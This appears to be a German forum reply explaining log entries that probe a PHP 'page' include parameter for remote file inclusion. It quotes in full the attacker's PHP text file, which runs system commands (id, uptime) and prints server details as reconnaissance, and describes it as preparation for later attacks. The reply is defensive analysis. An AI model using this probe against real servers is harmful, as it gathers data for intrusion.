Moin Moin!

Normalerweise übergebe ich bei 'page' die Seite, welche angezeigt werden soll, sprich includiert wird. Natürlich überprüfe ich den übergebenen Parameter, ob dies wirklich einer Seite der Homepage entspricht.

Löblich, aber leider nicht unbedingt üblich. Genau auf eine fehlende Prüfung zielen diese Seitenaufrufe ab. PHP hat ja leider die unangenehme Eigenschaft, ohne weiteres beliebige Resourcen auf anderen Servern als Programmcode ausführen zu können.

Die safe1.txt und die sa.txt (man findet weitere Dateinamen wenn man danach g**gelt) dient offensichtlich der Beschaffung von Webserver-Informationen die evtl. für Angriffe auf den Webspace genutzt werden könnten.

Exakt.

Ist näheres bekannt, welchem Zweck dies dient bzw. woher diese Aufrufe kommen?

Vorbereitung.

Kommt dies evtl. von einem Bot-Netzwerk?

Vielleicht.

Der Inhalt der Textdateien:

<?

echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "0wnW4y<br>";
exit;
?>

  
Umständlich, aber der Zweck ist ziemlich offensichtlich. Informationsbeschaffung. Wenn Du angreifbar bist und/oder Dein Server ausreichend attraktiv ist, werden irgendwann echte Angriffe basierend auf diesen Daten folgen.  
  
Alexander

-- 
Today I will gladly share my knowledge and experience, for there are no sweeter words than "I told you so".